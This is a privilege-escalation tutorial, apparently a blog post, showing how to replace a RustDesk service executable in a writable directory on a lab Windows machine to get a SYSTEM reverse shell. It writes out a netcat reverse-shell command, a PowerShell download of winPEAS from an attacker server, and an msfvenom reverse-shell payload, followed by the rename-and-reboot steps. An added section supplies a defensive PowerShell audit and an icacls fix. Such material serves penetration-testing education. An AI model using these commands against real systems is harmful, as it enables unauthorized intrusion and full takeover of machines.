Windows Privilege Escalation — Service directory write based privesc
Service directory write based privesc
Before exploiting the service, we will build the vulnerable machine ourselves and then perform the exploit.
Let’s Start
Install any remote desktop application; here we install the “RustDesk” application, run it once and close it.
Let’s check for a normal (non-administrative) user account.
$net user
Then check whether the “test” user is a member of any administrative group. The “test” user should not be a member of an administrative group.
$net user test
Grant permissions to the user from which you want to perform the privilege escalation.
Here we will grant the permissions to the “test” user.
Right-click on the RustDesk folder → Security → Edit → Add → Advanced → Find Now → Select the "test" user
Give the “test” user full rights.
Now the “test” user has write permission on the service directory.
The setup part is now complete.
Initial Access
Open a command prompt as the “test” user.
Locate the Netcat executable on your machine.
Let’s throw a shell using Netcat.
Assume that we exploited some service and obtained this initial shell.
$nc.exe -e cmd.exe <ip_address> <port_number>
Let’s perform the Windows privilege escalation attack
(service directory write based privesc).
We successfully got the initial shell.
Now the question is: once you have an initial shell on a Windows system, what do you do?
The first thing is to upload winPEAS without thinking twice.
Start a Python HTTP server and download winPEAS onto the Windows system.
$powershell -c wget http://192.168.29.219:8001/winPEASx64.exe -OutFile win.exe
Now run the winPEAS binary that was downloaded to the system.
Here we are interested only in the “Installed Application [All Access]” section.
AUTO_START — the service starts automatically whenever the system boots or restarts.
BINARY_PATH_NAME — the service executable path.
SERVICE_START_NAME is LocalSystem, which means the service runs with the highest privilege.
Here we cannot start or stop the service.
But we can write to the service executable directory.
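As an added defensive check (not part of the original post), the following PowerShell audit lists every service whose executable directory is writable by a low-privileged identity, together with its start mode and service account, so an administrator can spot the AUTO_START / LocalSystem / writable-directory combination described above before someone else does. The identity list, the rights mask and the path parsing are my assumptions.

```powershell
# Added audit example (not from the original post). Run from an elevated
# PowerShell for a complete view of every service's ACL.
# Identities we treat as low-privileged (assumption; extend for your domain).
$lowPriv = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users',
             'NT AUTHORITY\INTERACTIVE')
# Rights that allow replacing or renaming files in the directory.
$writeMask = [int][System.Security.AccessControl.FileSystemRights]'Write, Modify, FullControl, Delete'
# Inherited ACEs sometimes carry generic rights instead of specific ones.
$genericWrite = 0x40000000 -bor 0x10000000   # GENERIC_WRITE | GENERIC_ALL

Get-CimInstance Win32_Service | ForEach-Object {
    $svc = $_
    if (-not $svc.PathName) { return }
    # PathName may be quoted and may carry arguments; keep only the executable path.
    $exe = if ($svc.PathName -match '^"([^"]+)"') { $Matches[1] }
           else { ($svc.PathName -split ' -| /')[0].Trim() }
    $dir = Split-Path -Path $exe -Parent -ErrorAction SilentlyContinue
    if (-not $dir -or -not (Test-Path -LiteralPath $dir)) { return }
    try { $acl = Get-Acl -LiteralPath $dir } catch { return }
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($lowPriv -notcontains $ace.IdentityReference.Value) { continue }
        $rights = [int]$ace.FileSystemRights
        if (($rights -band ($writeMask -bor $genericWrite)) -eq 0) { continue }
        # One row per offending ACE: this is exactly the winPEAS finding above.
        [pscustomobject]@{
            Service   = $svc.Name
            StartMode = $svc.StartMode
            RunsAs    = $svc.StartName
            Directory = $dir
            Identity  = $ace.IdentityReference.Value
            Rights    = $ace.FileSystemRights
        }
    }
} | Sort-Object Service | Format-Table -AutoSize
```

Any row with StartMode Auto and RunsAs LocalSystem is the condition this post abuses; remediate by removing the write ACE (for example `icacls "<dir>" /remove:g "<identity>"`) and leaving only Administrators and SYSTEM with write access.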
So, let’s generate a payload from “msfvenom”.
$msfvenom -p windows/x64/shell_reverse_tcp lhost=192.168.29.219 lport=5000 -f exe > shell.exe
We will write the above payload in place of the RustDesk executable.
Now the question is: how do we start the service?
We tried the same method as in the previous exploit to restart the service, but access is denied.
https://medium.com/@anandnikhil33/windows-privilege-escalation-8214ceaf4db8
As we noticed, the service is in AUTO_START mode.
Let’s check whether we have the right to restart the system.
In the PoC below, “SeShutdownPrivilege” shows as Disabled, but it is enabled by default, so ignore that.
Navigate to the “RustDesk” executable path.
We will download the above payload into the RustDesk executable directory.
Whenever a service is running and its executable is in use, any attempt to overwrite that file fails with “The process cannot access the file because it is being used by another process.”
Now we use “rename” to rename the running service executable.
Notice that we no longer have any file named “rustdesk.exe”.
Copy shell.exe under the name rustdesk.exe; whenever this file is executed again, we will get a reverse shell.
This is the method we have to follow in service directory write based privesc:
we have renamed the running service executable and written our file in its place.
Now the official “RustDesk” path points to our malicious executable.
How do we take advantage of this?
We have to reboot the system.
Rebooting the system.
We got the shell successfully by replacing the service executable with the reverse shell payload and restarting the service.